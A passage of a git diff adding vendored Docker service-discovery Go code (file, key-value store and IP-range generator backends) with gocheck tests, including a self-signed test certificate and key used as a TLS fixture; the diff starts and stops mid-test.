+	c.Assert(entries.Contains(&Entry{Host: "127.0.0.3", Port: "2375"}), check.Equals, false)
+}
+
+func (s *DiscoverySuite) TestEntriesEquality(c *check.C) {
+	entries := Entries{
+		&Entry{Host: "127.0.0.1", Port: "2375"},
+		&Entry{Host: "127.0.0.2", Port: "2375"},
+	}
+
+	// Same
+	c.Assert(entries.Equals(Entries{
+		&Entry{Host: "127.0.0.1", Port: "2375"},
+		&Entry{Host: "127.0.0.2", Port: "2375"},
+	}), check.
+		Equals, true)
+
+	// Different size
+	c.Assert(entries.Equals(Entries{
+		&Entry{Host: "127.0.0.1", Port: "2375"},
+		&Entry{Host: "127.0.0.2", Port: "2375"},
+		&Entry{Host: "127.0.0.3", Port: "2375"},
+	}), check.
+		Equals, false)
+
+	// Different content
+	c.Assert(entries.Equals(Entries{
+		&Entry{Host: "127.0.0.1", Port: "2375"},
+		&Entry{Host: "127.0.0.42", Port: "2375"},
+	}), check.
+		Equals, false)
+
+}
+
+func (s *DiscoverySuite) TestEntriesDiff(c *check.C) {
+	entry1 := &Entry{Host: "1.1.1.1", Port: "1111"}
+	entry2 := &Entry{Host: "2.2.2.2", Port: "2222"}
+	entry3 := &Entry{Host: "3.3.3.3", Port: "3333"}
+	entries := Entries{entry1, entry2}
+
+	// No diff
+	added, removed := entries.Diff(Entries{entry2, entry1})
+	c.Assert(added, check.HasLen, 0)
+	c.Assert(removed, check.HasLen, 0)
+
+	// Add
+	added, removed = entries.Diff(Entries{entry2, entry3, entry1})
+	c.Assert(added, check.HasLen, 1)
+	c.Assert(added.Contains(entry3), check.Equals, true)
+	c.Assert(removed, check.HasLen, 0)
+
+	// Remove
+	added, removed = entries.Diff(Entries{entry2})
+	c.Assert(added, check.HasLen, 0)
+	c.Assert(removed, check.HasLen, 1)
+	c.Assert(removed.Contains(entry1), check.Equals, true)
+
+	// Add and remove
+	added, removed = entries.Diff(Entries{entry1, entry3})
+	c.Assert(added, check.HasLen, 1)
+	c.Assert(added.Contains(entry3), check.Equals, true)
+	c.Assert(removed, check.HasLen, 1)
+	c.Assert(removed.Contains(entry2), check.Equals, true)
+}
diff --git a/vendor/github.com/docker/docker/pkg/discovery/entry.go b/vendor/github.com/docker/docker/pkg/discovery/entry.go
new file mode 100644
index 0000000000..ce23bbf89b
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/discovery/entry.go
@@ -0,0 +1,94 @@
+package discovery
+
+import "net"
+
+// NewEntry creates a new entry.
+func NewEntry(url string) (*Entry, error) {
+	host, port, err := net.SplitHostPort(url)
+	if err != nil {
+		return nil, err
+	}
+	return &Entry{host, port}, nil
+}
+
+// An Entry represents a host.
+type Entry struct {
+	Host string
+	Port string
+}
+
+// Equals returns true if cmp contains the same data.
+func (e *Entry) Equals(cmp *Entry) bool {
+	return e.Host == cmp.Host && e.Port == cmp.Port
+}
+
+// String returns the string form of an entry.
+func (e *Entry) String() string {
+	return net.JoinHostPort(e.Host, e.Port)
+}
+
+// Entries is a list of *Entry with some helpers.
+type Entries []*Entry
+
+// Equals returns true if cmp contains the same data.
+func (e Entries) Equals(cmp Entries) bool {
+	// Check if the file has really changed.
+	if len(e) != len(cmp) {
+		return false
+	}
+	for i := range e {
+		if !e[i].Equals(cmp[i]) {
+			return false
+		}
+	}
+	return true
+}
+
+// Contains returns true if the Entries contain a given Entry.
+func (e Entries) Contains(entry *Entry) bool {
+	for _, curr := range e {
+		if curr.Equals(entry) {
+			return true
+		}
+	}
+	return false
+}
+
+// Diff compares two entries and returns the added and removed entries.
+func (e Entries) Diff(cmp Entries) (Entries, Entries) {
+	added := Entries{}
+	for _, entry := range cmp {
+		if !e.Contains(entry) {
+			added = append(added, entry)
+		}
+	}
+
+	removed := Entries{}
+	for _, entry := range e {
+		if !cmp.Contains(entry) {
+			removed = append(removed, entry)
+		}
+	}
+
+	return added, removed
+}
+
+// CreateEntries returns an array of entries based on the given addresses.
+func CreateEntries(addrs []string) (Entries, error) {
+	entries := Entries{}
+	if addrs == nil {
+		return entries, nil
+	}
+
+	for _, addr := range addrs {
+		if len(addr) == 0 {
+			continue
+		}
+		entry, err := NewEntry(addr)
+		if err != nil {
+			return nil, err
+		}
+		entries = append(entries, entry)
+	}
+	return entries, nil
+}
diff --git a/vendor/github.com/docker/docker/pkg/discovery/file/file.go b/vendor/github.com/docker/docker/pkg/discovery/file/file.go
new file mode 100644
index 0000000000..2b8e27b754
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/discovery/file/file.go
@@ -0,0 +1,107 @@
+package file
+
+import (
+	"fmt"
+	"io/ioutil"
+	"strings"
+	"time"
+
+	"github.com/docker/docker/pkg/discovery"
+)
+
+// Discovery is exported
+type Discovery struct {
+	heartbeat time.Duration
+	path      string
+}
+
+func init() {
+	Init()
+}
+
+// Init is exported
+func Init() {
+	discovery.Register("file", &Discovery{})
+}
+
+// Initialize is exported
+func (s *Discovery) Initialize(path string, heartbeat time.Duration, ttl time.Duration, _ map[string]string) error {
+	s.path = path
+	s.heartbeat = heartbeat
+	return nil
+}
+
+func parseFileContent(content []byte) []string {
+	var result []string
+	for _, line := range strings.Split(strings.TrimSpace(string(content)), "\n") {
+		line = strings.TrimSpace(line)
+		// Ignoring line starts with #
+		if strings.HasPrefix(line, "#") {
+			continue
+		}
+		// Inlined # comment also ignored.
+		if strings.Contains(line, "#") {
+			line = line[0:strings.Index(line, "#")]
+			// Trim additional spaces caused by above stripping.
+			line = strings.TrimSpace(line)
+		}
+		result = append(result, discovery.Generate(line)...)
+	}
+	return result
+}
+
+func (s *Discovery) fetch() (discovery.Entries, error) {
+	fileContent, err := ioutil.ReadFile(s.path)
+	if err != nil {
+		return nil, fmt.Errorf("failed to read '%s': %v", s.path, err)
+	}
+	return discovery.CreateEntries(parseFileContent(fileContent))
+}
+
+// Watch is exported
+func (s *Discovery) Watch(stopCh <-chan struct{}) (<-chan discovery.Entries, <-chan error) {
+	ch := make(chan discovery.Entries)
+	errCh := make(chan error)
+	ticker := time.NewTicker(s.heartbeat)
+
+	go func() {
+		defer close(errCh)
+		defer close(ch)
+
+		// Send the initial entries if available.
+		currentEntries, err := s.fetch()
+		if err != nil {
+			errCh <- err
+		} else {
+			ch <- currentEntries
+		}
+
+		// Periodically send updates.
+		for {
+			select {
+			case <-ticker.C:
+				newEntries, err := s.fetch()
+				if err != nil {
+					errCh <- err
+					continue
+				}
+
+				// Check if the file has really changed.
+				if !newEntries.Equals(currentEntries) {
+					ch <- newEntries
+				}
+				currentEntries = newEntries
+			case <-stopCh:
+				ticker.Stop()
+				return
+			}
+		}
+	}()
+
+	return ch, errCh
+}
+
+// Register is exported
+func (s *Discovery) Register(addr string) error {
+	return discovery.ErrNotImplemented
+}
diff --git a/vendor/github.com/docker/docker/pkg/discovery/file/file_test.go b/vendor/github.com/docker/docker/pkg/discovery/file/file_test.go
new file mode 100644
index 0000000000..667f00ba0d
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/discovery/file/file_test.go
@@ -0,0 +1,114 @@
+package file
+
+import (
+	"io/ioutil"
+	"os"
+	"testing"
+
+	"github.com/docker/docker/pkg/discovery"
+
+	"github.com/go-check/check"
+)
+
+// Hook up gocheck into the "go test" runner.
+func Test(t *testing.T) { check.TestingT(t) }
+
+type DiscoverySuite struct{}
+
+var _ = check.Suite(&DiscoverySuite{})
+
+func (s *DiscoverySuite) TestInitialize(c *check.C) {
+	d := &Discovery{}
+	d.Initialize("/path/to/file", 1000, 0, nil)
+	c.Assert(d.path, check.Equals, "/path/to/file")
+}
+
+func (s *DiscoverySuite) TestNew(c *check.C) {
+	d, err := discovery.New("file:///path/to/file", 0, 0, nil)
+	c.Assert(err, check.IsNil)
+	c.Assert(d.(*Discovery).path, check.Equals, "/path/to/file")
+}
+
+func (s *DiscoverySuite) TestContent(c *check.C) {
+	data := `
+1.1.1.[1:2]:1111
+2.2.2.[2:4]:2222
+`
+	ips := parseFileContent([]byte(data))
+	c.Assert(ips, check.HasLen, 5)
+	c.Assert(ips[0], check.Equals, "1.1.1.1:1111")
+	c.Assert(ips[1], check.Equals, "1.1.1.2:1111")
+	c.Assert(ips[2], check.Equals, "2.2.2.2:2222")
+	c.Assert(ips[3], check.Equals, "2.2.2.3:2222")
+	c.Assert(ips[4], check.Equals, "2.2.2.4:2222")
+}
+
+func (s *DiscoverySuite) TestRegister(c *check.C) {
+	discovery := &Discovery{path: "/path/to/file"}
+	c.Assert(discovery.Register("0.0.0.0"), check.NotNil)
+}
+
+func (s *DiscoverySuite) TestParsingContentsWithComments(c *check.C) {
+	data := `
+### test ###
+1.1.1.1:1111 # inline comment
+# 2.2.2.2:2222
+      ### empty line with comment
+    3.3.3.3:3333
+### test ###
+`
+	ips := parseFileContent([]byte(data))
+	c.Assert(ips, check.HasLen, 2)
+	c.Assert("1.1.1.1:1111", check.Equals, ips[0])
+	c.Assert("3.3.3.3:3333", check.Equals, ips[1])
+}
+
+func (s *DiscoverySuite) TestWatch(c *check.C) {
+	data := `
+1.1.1.1:1111
+2.2.2.2:2222
+`
+	expected := discovery.Entries{
+		&discovery.Entry{Host: "1.1.1.1", Port: "1111"},
+		&discovery.Entry{Host: "2.2.2.2", Port: "2222"},
+	}
+
+	// Create a temporary file and remove it.
+	tmp, err := ioutil.TempFile(os.TempDir(), "discovery-file-test")
+	c.Assert(err, check.IsNil)
+	c.Assert(tmp.Close(), check.IsNil)
+	c.Assert(os.Remove(tmp.Name()), check.IsNil)
+
+	// Set up file discovery.
+	d := &Discovery{}
+	d.Initialize(tmp.Name(), 1000, 0, nil)
+	stopCh := make(chan struct{})
+	ch, errCh := d.Watch(stopCh)
+
+	// Make sure it fires errors since the file doesn't exist.
+	c.Assert(<-errCh, check.NotNil)
+	// We have to drain the error channel otherwise Watch will get stuck.
+	go func() {
+		for range errCh {
+		}
+	}()
+
+	// Write the file and make sure we get the expected value back.
+	c.Assert(ioutil.WriteFile(tmp.Name(), []byte(data), 0600), check.IsNil)
+	c.Assert(<-ch, check.DeepEquals, expected)
+
+	// Add a new entry and look it up.
+	expected = append(expected, &discovery.Entry{Host: "3.3.3.3", Port: "3333"})
+	f, err := os.OpenFile(tmp.Name(), os.O_APPEND|os.O_WRONLY, 0600)
+	c.Assert(err, check.IsNil)
+	c.Assert(f, check.NotNil)
+	_, err = f.WriteString("\n3.3.3.3:3333\n")
+	c.Assert(err, check.IsNil)
+	f.Close()
+	c.Assert(<-ch, check.DeepEquals, expected)
+
+	// Stop and make sure it closes all channels.
+	close(stopCh)
+	c.Assert(<-ch, check.IsNil)
+	c.Assert(<-errCh, check.IsNil)
+}
diff --git a/vendor/github.com/docker/docker/pkg/discovery/generator.go b/vendor/github.com/docker/docker/pkg/discovery/generator.go
new file mode 100644
index 0000000000..d22298298f
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/discovery/generator.go
@@ -0,0 +1,35 @@
+package discovery
+
+import (
+	"fmt"
+	"regexp"
+	"strconv"
+)
+
+// Generate takes care of IP generation
+func Generate(pattern string) []string {
+	re, _ := regexp.Compile(`\[(.+):(.+)\]`)
+	submatch := re.FindStringSubmatch(pattern)
+	if submatch == nil {
+		return []string{pattern}
+	}
+
+	from, err := strconv.Atoi(submatch[1])
+	if err != nil {
+		return []string{pattern}
+	}
+	to, err := strconv.Atoi(submatch[2])
+	if err != nil {
+		return []string{pattern}
+	}
+
+	template := re.ReplaceAllString(pattern, "%d")
+
+	var result []string
+	for val := from; val <= to; val++ {
+		entry := fmt.Sprintf(template, val)
+		result = append(result, entry)
+	}
+
+	return result
+}
diff --git a/vendor/github.com/docker/docker/pkg/discovery/generator_test.go b/vendor/github.com/docker/docker/pkg/discovery/generator_test.go
new file mode 100644
index 0000000000..6281c46665
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/discovery/generator_test.go
@@ -0,0 +1,53 @@
+package discovery
+
+import (
+	"github.com/go-check/check"
+)
+
+func (s *DiscoverySuite) TestGeneratorNotGenerate(c *check.C) {
+	ips := Generate("127.0.0.1")
+	c.Assert(len(ips), check.Equals, 1)
+	c.Assert(ips[0], check.Equals, "127.0.0.1")
+}
+
+func (s *DiscoverySuite) TestGeneratorWithPortNotGenerate(c *check.C) {
+	ips := Generate("127.0.0.1:8080")
+	c.Assert(len(ips), check.Equals, 1)
+	c.Assert(ips[0], check.Equals, "127.0.0.1:8080")
+}
+
+func (s *DiscoverySuite) TestGeneratorMatchFailedNotGenerate(c *check.C) {
+	ips := Generate("127.0.0.[1]")
+	c.Assert(len(ips), check.Equals, 1)
+	c.Assert(ips[0], check.Equals, "127.0.0.[1]")
+}
+
+func (s *DiscoverySuite) TestGeneratorWithPort(c *check.C) {
+	ips := Generate("127.0.0.[1:11]:2375")
+	c.Assert(len(ips), check.Equals, 11)
+	c.Assert(ips[0], check.Equals, "127.0.0.1:2375")
+	c.Assert(ips[1], check.Equals, "127.0.0.2:2375")
+	c.Assert(ips[2], check.Equals, "127.0.0.3:2375")
+	c.Assert(ips[3], check.Equals, "127.0.0.4:2375")
+	c.Assert(ips[4], check.Equals, "127.0.0.5:2375")
+	c.Assert(ips[5], check.Equals, "127.0.0.6:2375")
+	c.Assert(ips[6], check.Equals, "127.0.0.7:2375")
+	c.Assert(ips[7], check.Equals, "127.0.0.8:2375")
+	c.Assert(ips[8], check.Equals, "127.0.0.9:2375")
+	c.Assert(ips[9], check.Equals, "127.0.0.10:2375")
+	c.Assert(ips[10], check.Equals, "127.0.0.11:2375")
+}
+
+func (s *DiscoverySuite) TestGenerateWithMalformedInputAtRangeStart(c *check.C) {
+	malformedInput := "127.0.0.[x:11]:2375"
+	ips := Generate(malformedInput)
+	c.Assert(len(ips), check.Equals, 1)
+	c.Assert(ips[0], check.Equals, malformedInput)
+}
+
+func (s *DiscoverySuite) TestGenerateWithMalformedInputAtRangeEnd(c *check.C) {
+	malformedInput := "127.0.0.[1:x]:2375"
+	ips := Generate(malformedInput)
+	c.Assert(len(ips), check.Equals, 1)
+	c.Assert(ips[0], check.Equals, malformedInput)
+}
diff --git a/vendor/github.com/docker/docker/pkg/discovery/kv/kv.go b/vendor/github.com/docker/docker/pkg/discovery/kv/kv.go
new file mode 100644
index 0000000000..77eee7d454
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/discovery/kv/kv.go
@@ -0,0 +1,192 @@
+package kv
+
+import (
+	"fmt"
+	"path"
+	"strings"
+	"time"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/docker/pkg/discovery"
+	"github.com/docker/go-connections/tlsconfig"
+	"github.com/docker/libkv"
+	"github.com/docker/libkv/store"
+	"github.com/docker/libkv/store/consul"
+	"github.com/docker/libkv/store/etcd"
+	"github.com/docker/libkv/store/zookeeper"
+)
+
+const (
+	defaultDiscoveryPath = "docker/nodes"
+)
+
+// Discovery is exported
+type Discovery struct {
+	backend   store.Backend
+	store     store.Store
+	heartbeat time.Duration
+	ttl       time.Duration
+	prefix    string
+	path      string
+}
+
+func init() {
+	Init()
+}
+
+// Init is exported
+func Init() {
+	// Register to libkv
+	zookeeper.Register()
+	consul.Register()
+	etcd.Register()
+
+	// Register to internal discovery service
+	discovery.Register("zk", &Discovery{backend: store.ZK})
+	discovery.Register("consul", &Discovery{backend: store.CONSUL})
+	discovery.Register("etcd", &Discovery{backend: store.ETCD})
+}
+
+// Initialize is exported
+func (s *Discovery) Initialize(uris string, heartbeat time.Duration, ttl time.Duration, clusterOpts map[string]string) error {
+	var (
+		parts = strings.SplitN(uris, "/", 2)
+		addrs = strings.Split(parts[0], ",")
+		err   error
+	)
+
+	// A custom prefix to the path can be optionally used.
+	if len(parts) == 2 {
+		s.prefix = parts[1]
+	}
+
+	s.heartbeat = heartbeat
+	s.ttl = ttl
+
+	// Use a custom path if specified in discovery options
+	dpath := defaultDiscoveryPath
+	if clusterOpts["kv.path"] != "" {
+		dpath = clusterOpts["kv.path"]
+	}
+
+	s.path = path.Join(s.prefix, dpath)
+
+	var config *store.Config
+	if clusterOpts["kv.cacertfile"] != "" && clusterOpts["kv.certfile"] != "" && clusterOpts["kv.keyfile"] != "" {
+		logrus.Info("Initializing discovery with TLS")
+		tlsConfig, err := tlsconfig.Client(tlsconfig.Options{
+			CAFile:   clusterOpts["kv.cacertfile"],
+			CertFile: clusterOpts["kv.certfile"],
+			KeyFile:  clusterOpts["kv.keyfile"],
+		})
+		if err != nil {
+			return err
+		}
+		config = &store.Config{
+			// Set ClientTLS to trigger https (bug in libkv/etcd)
+			ClientTLS: &store.ClientTLSConfig{
+				CACertFile: clusterOpts["kv.cacertfile"],
+				CertFile:   clusterOpts["kv.certfile"],
+				KeyFile:    clusterOpts["kv.keyfile"],
+			},
+			// The actual TLS config that will be used
+			TLS: tlsConfig,
+		}
+	} else {
+		logrus.Info("Initializing discovery without TLS")
+	}
+
+	// Creates a new store, will ignore options given
+	// if not supported by the chosen store
+	s.store, err = libkv.NewStore(s.backend, addrs, config)
+	return err
+}
+
+// Watch the store until either there's a store error or we receive a stop request.
+// Returns false if we shouldn't attempt watching the store anymore (stop request received).
+func (s *Discovery) watchOnce(stopCh <-chan struct{}, watchCh <-chan []*store.KVPair, discoveryCh chan discovery.Entries, errCh chan error) bool {
+	for {
+		select {
+		case pairs := <-watchCh:
+			if pairs == nil {
+				return true
+			}
+
+			logrus.WithField("discovery", s.backend).Debugf("Watch triggered with %d nodes", len(pairs))
+
+			// Convert `KVPair` into `discovery.Entry`.
+			addrs := make([]string, len(pairs))
+			for _, pair := range pairs {
+				addrs = append(addrs, string(pair.Value))
+			}
+
+			entries, err := discovery.CreateEntries(addrs)
+			if err != nil {
+				errCh <- err
+			} else {
+				discoveryCh <- entries
+			}
+		case <-stopCh:
+			// We were requested to stop watching.
+			return false
+		}
+	}
+}
+
+// Watch is exported
+func (s *Discovery) Watch(stopCh <-chan struct{}) (<-chan discovery.Entries, <-chan error) {
+	ch := make(chan discovery.Entries)
+	errCh := make(chan error)
+
+	go func() {
+		defer close(ch)
+		defer close(errCh)
+
+		// Forever: Create a store watch, watch until we get an error and then try again.
+		// Will only stop if we receive a stopCh request.
+		for {
+			// Create the path to watch if it does not exist yet
+			exists, err := s.store.Exists(s.path)
+			if err != nil {
+				errCh <- err
+			}
+			if !exists {
+				if err := s.store.Put(s.path, []byte(""), &store.WriteOptions{IsDir: true}); err != nil {
+					errCh <- err
+				}
+			}
+
+			// Set up a watch.
+			watchCh, err := s.store.WatchTree(s.path, stopCh)
+			if err != nil {
+				errCh <- err
+			} else {
+				if !s.watchOnce(stopCh, watchCh, ch, errCh) {
+					return
+				}
+			}
+
+			// If we get here it means the store watch channel was closed. This
+			// is unexpected so let's retry later.
+			errCh <- fmt.Errorf("Unexpected watch error")
+			time.Sleep(s.heartbeat)
+		}
+	}()
+	return ch, errCh
+}
+
+// Register is exported
+func (s *Discovery) Register(addr string) error {
+	opts := &store.WriteOptions{TTL: s.ttl}
+	return s.store.Put(path.Join(s.path, addr), []byte(addr), opts)
+}
+
+// Store returns the underlying store used by KV discovery.
+func (s *Discovery) Store() store.Store {
+	return s.store
+}
+
+// Prefix returns the store prefix
+func (s *Discovery) Prefix() string {
+	return s.prefix
+}
diff --git a/vendor/github.com/docker/docker/pkg/discovery/kv/kv_test.go b/vendor/github.com/docker/docker/pkg/discovery/kv/kv_test.go
new file mode 100644
index 0000000000..dab3939dd0
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/discovery/kv/kv_test.go
@@ -0,0 +1,324 @@
+package kv
+
+import (
+	"errors"
+	"io/ioutil"
+	"os"
+	"path"
+	"testing"
+	"time"
+
+	"github.com/docker/docker/pkg/discovery"
+	"github.com/docker/libkv"
+	"github.com/docker/libkv/store"
+
+	"github.com/go-check/check"
+)
+
+// Hook up gocheck into the "go test" runner.
+func Test(t *testing.T) { check.TestingT(t) }
+
+type DiscoverySuite struct{}
+
+var _ = check.Suite(&DiscoverySuite{})
+
+func (ds *DiscoverySuite) TestInitialize(c *check.C) {
+	storeMock := &FakeStore{
+		Endpoints: []string{"127.0.0.1"},
+	}
+	d := &Discovery{backend: store.CONSUL}
+	d.Initialize("127.0.0.1", 0, 0, nil)
+	d.store = storeMock
+
+	s := d.store.(*FakeStore)
+	c.Assert(s.Endpoints, check.HasLen, 1)
+	c.Assert(s.Endpoints[0], check.Equals, "127.0.0.1")
+	c.Assert(d.path, check.Equals, defaultDiscoveryPath)
+
+	storeMock = &FakeStore{
+		Endpoints: []string{"127.0.0.1:1234"},
+	}
+	d = &Discovery{backend: store.CONSUL}
+	d.Initialize("127.0.0.1:1234/path", 0, 0, nil)
+	d.store = storeMock
+
+	s = d.store.(*FakeStore)
+	c.Assert(s.Endpoints, check.HasLen, 1)
+	c.Assert(s.Endpoints[0], check.Equals, "127.0.0.1:1234")
+	c.Assert(d.path, check.Equals, "path/"+defaultDiscoveryPath)
+
+	storeMock = &FakeStore{
+		Endpoints: []string{"127.0.0.1:1234", "127.0.0.2:1234", "127.0.0.3:1234"},
+	}
+	d = &Discovery{backend: store.CONSUL}
+	d.Initialize("127.0.0.1:1234,127.0.0.2:1234,127.0.0.3:1234/path", 0, 0, nil)
+	d.store = storeMock
+
+	s = d.store.(*FakeStore)
+	c.Assert(s.Endpoints, check.HasLen, 3)
+	c.Assert(s.Endpoints[0], check.Equals, "127.0.0.1:1234")
+	c.Assert(s.Endpoints[1], check.Equals, "127.0.0.2:1234")
+	c.Assert(s.Endpoints[2], check.Equals, "127.0.0.3:1234")
+
+	c.Assert(d.path, check.Equals, "path/"+defaultDiscoveryPath)
+}
+
+// Extremely limited mock store so we can test initialization
+type Mock struct {
+	// Endpoints passed to InitializeMock
+	Endpoints []string
+
+	// Options passed to InitializeMock
+	Options *store.Config
+}
+
+func NewMock(endpoints []string, options *store.Config) (store.Store, error) {
+	s := &Mock{}
+	s.Endpoints = endpoints
+	s.Options = options
+	return s, nil
+}
+func (s *Mock) Put(key string, value []byte, opts *store.WriteOptions) error {
+	return errors.New("Put not supported")
+}
+func (s *Mock) Get(key string) (*store.KVPair, error) {
+	return nil, errors.New("Get not supported")
+}
+func (s *Mock) Delete(key string) error {
+	return errors.New("Delete not supported")
+}
+
+// Exists mock
+func (s *Mock) Exists(key string) (bool, error) {
+	return false, errors.New("Exists not supported")
+}
+
+// Watch mock
+func (s *Mock) Watch(key string, stopCh <-chan struct{}) (<-chan *store.KVPair, error) {
+	return nil, errors.New("Watch not supported")
+}
+
+// WatchTree mock
+func (s *Mock) WatchTree(prefix string, stopCh <-chan struct{}) (<-chan []*store.KVPair, error) {
+	return nil, errors.New("WatchTree not supported")
+}
+
+// NewLock mock
+func (s *Mock) NewLock(key string, options *store.LockOptions) (store.Locker, error) {
+	return nil, errors.New("NewLock not supported")
+}
+
+// List mock
+func (s *Mock) List(prefix string) ([]*store.KVPair, error) {
+	return nil, errors.New("List not supported")
+}
+
+// DeleteTree mock
+func (s *Mock) DeleteTree(prefix string) error {
+	return errors.New("DeleteTree not supported")
+}
+
+// AtomicPut mock
+func (s *Mock) AtomicPut(key string, value []byte, previous *store.KVPair, opts *store.WriteOptions) (bool, *store.KVPair, error) {
+	return false, nil, errors.New("AtomicPut not supported")
+}
+
+// AtomicDelete mock
+func (s *Mock) AtomicDelete(key string, previous *store.KVPair) (bool, error) {
+	return false, errors.New("AtomicDelete not supported")
+}
+
+// Close mock
+func (s *Mock) Close() {
+	return
+}
+
+func (ds *DiscoverySuite) TestInitializeWithCerts(c *check.C) {
+	cert := `-----BEGIN CERTIFICATE-----
+MIIDCDCCAfKgAwIBAgIICifG7YeiQOEwCwYJKoZIhvcNAQELMBIxEDAOBgNVBAMT
+B1Rlc3QgQ0EwHhcNMTUxMDAxMjMwMDAwWhcNMjAwOTI5MjMwMDAwWjASMRAwDgYD
+VQQDEwdUZXN0IENBMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA1wRC
+O+flnLTK5ImjTurNRHwSejuqGbc4CAvpB0hS+z0QlSs4+zE9h80aC4hz+6caRpds
++J908Q+RvAittMHbpc7VjbZP72G6fiXk7yPPl6C10HhRSoSi3nY+B7F2E8cuz14q
+V2e+ejhWhSrBb/keyXpcyjoW1BOAAJ2TIclRRkICSCZrpXUyXxAvzXfpFXo1RhSb
+UywN11pfiCQzDUN7sPww9UzFHuAHZHoyfTr27XnJYVUerVYrCPq8vqfn//01qz55
+Xs0hvzGdlTFXhuabFtQnKFH5SNwo/fcznhB7rePOwHojxOpXTBepUCIJLbtNnWFT
+V44t9gh5IqIWtoBReQIDAQABo2YwZDAOBgNVHQ8BAf8EBAMCAAYwEgYDVR0TAQH/
+BAgwBgEB/wIBAjAdBgNVHQ4EFgQUZKUI8IIjIww7X/6hvwggQK4bD24wHwYDVR0j
+BBgwFoAUZKUI8IIjIww7X/6hvwggQK4bD24wCwYJKoZIhvcNAQELA4IBAQDES2cz
+7sCQfDCxCIWH7X8kpi/JWExzUyQEJ0rBzN1m3/x8ySRxtXyGekimBqQwQdFqlwMI
+xzAQKkh3ue8tNSzRbwqMSyH14N1KrSxYS9e9szJHfUasoTpQGPmDmGIoRJuq1h6M
+ej5x1SCJ7GWCR6xEXKUIE9OftXm9TdFzWa7Ja3OHz/mXteii8VXDuZ5ACq6EE5bY
+8sP4gcICfJ5fTrpTlk9FIqEWWQrCGa5wk95PGEj+GJpNogjXQ97wVoo/Y3p1brEn
+t5zjN9PAq4H1fuCMdNNA+p1DHNwd+ELTxcMAnb2ajwHvV6lKPXutrTFc4umJToBX
+FpTxDmJHEV4bzUzh
+-----END CERTIFICATE-----
+`
+	key := `-----BEGIN RSA PRIVATE KEY-----
+MIIEpQIBAAKCAQEA1wRCO+flnLTK5ImjTurNRHwSejuqGbc4CAvpB0hS+z0QlSs4
++zE9h80aC4hz+6caRpds+J908Q+RvAittMHbpc7VjbZP72G6fiXk7yPPl6C10HhR
+SoSi3nY+B7F2E8cuz14qV2e+ejhWhSrBb/keyXpcyjoW1BOAAJ2TIclRRkICSCZr
+pXUyXxAvzXfpFXo1RhSbUywN11pfiCQzDUN7sPww9UzFHuAHZHoyfTr27XnJYVUe
+rVYrCPq8vqfn//01qz55Xs0hvzGdlTFXhuabFtQnKFH5SNwo/fcznhB7rePOwHoj
+xOpXTBepUCIJLbtNnWFTV44t9gh5IqIWtoBReQIDAQABAoIBAHSWipORGp/uKFXj
+i/mut776x8ofsAxhnLBARQr93ID+i49W8H7EJGkOfaDjTICYC1dbpGrri61qk8sx
+qX7p3v/5NzKwOIfEpirgwVIqSNYe/ncbxnhxkx6tXtUtFKmEx40JskvSpSYAhmmO
+1XSx0E/PWaEN/nLgX/f1eWJIlxlQkk3QeqL+FGbCXI48DEtlJ9+MzMu4pAwZTpj5
+5qtXo5JJ0jRGfJVPAOznRsYqv864AhMdMIWguzk6EGnbaCWwPcfcn+h9a5LMdony
+MDHfBS7bb5tkF3+AfnVY3IBMVx7YlsD9eAyajlgiKu4zLbwTRHjXgShy+4Oussz0
+ugNGnkECgYEA/hi+McrZC8C4gg6XqK8+9joD8tnyDZDz88BQB7CZqABUSwvjDqlP
+L8hcwo/lzvjBNYGkqaFPUICGWKjeCtd8pPS2DCVXxDQX4aHF1vUur0uYNncJiV3N
+XQz4Iemsa6wnKf6M67b5vMXICw7dw0HZCdIHD1hnhdtDz0uVpeevLZ8CgYEA2KCT
+Y43lorjrbCgMqtlefkr3GJA9dey+hTzCiWEOOqn9RqGoEGUday0sKhiLofOgmN2B
+LEukpKIey8s+Q/cb6lReajDVPDsMweX8i7hz3Wa4Ugp4Xa5BpHqu8qIAE2JUZ7bU
+t88aQAYE58pUF+/Lq1QzAQdrjjzQBx6SrBxieecCgYEAvukoPZEC8mmiN1VvbTX+
+QFHmlZha3QaDxChB+QUe7bMRojEUL/fVnzkTOLuVFqSfxevaI/km9n0ac5KtAchV
+xjp2bTnBb5EUQFqjopYktWA+xO07JRJtMfSEmjZPbbay1kKC7rdTfBm961EIHaRj
+xZUf6M+rOE8964oGrdgdLlECgYEA046GQmx6fh7/82FtdZDRQp9tj3SWQUtSiQZc
+qhO59Lq8mjUXz+MgBuJXxkiwXRpzlbaFB0Bca1fUoYw8o915SrDYf/Zu2OKGQ/qa
+V81sgiVmDuEgycR7YOlbX6OsVUHrUlpwhY3hgfMe6UtkMvhBvHF/WhroBEIJm1pV
+PXZ/CbMCgYEApNWVktFBjOaYfY6SNn4iSts1jgsQbbpglg3kT7PLKjCAhI6lNsbk
+dyT7ut01PL6RaW4SeQWtrJIVQaM6vF3pprMKqlc5XihOGAmVqH7rQx9rtQB5TicL
+BFrwkQE4HQtQBV60hYQUzzlSk44VFDz+jxIEtacRHaomDRh2FtOTz+I=
+-----END RSA PRIVATE KEY-----
+`
+	certFile, err := ioutil.TempFile("", "cert")
+	c.Assert(err, check.IsNil)
+	defer os.Remove(certFile.Name())
+	certFile.Write([]byte(cert))
+	certFile.Close()
+	keyFile, err := ioutil.TempFile("", "key")
+	c.Assert(err, check.IsNil)
+	defer os.Remove(keyFile.Name())
+	keyFile.Write([]byte(key))
+	keyFile.Close()
+
+	libkv.AddStore("mock", NewMock)
+	d := &Discovery{backend: "mock"}
+	err = d.Initialize("127.0.0.3:1234", 0, 0, map[string]string{
+		"kv.cacertfile": certFile.Name(),
+		"kv.certfile":   certFile.Name(),
+		"kv.keyfile":    keyFile.Name(),
+	})
+	c.Assert(err, check.IsNil)
+	s := d.store.(*Mock)
+	c.Assert(s.Options.TLS, check.NotNil)
+	c.Assert(s.Options.TLS.RootCAs, check.NotNil)
+	c.Assert(s.Options.TLS.Certificates, check.HasLen, 1)
+}
+
+func (ds *DiscoverySuite) TestWatch(c *check.C) {
+	mockCh := make(chan []*store.KVPair)
+
+	storeMock := &FakeStore{
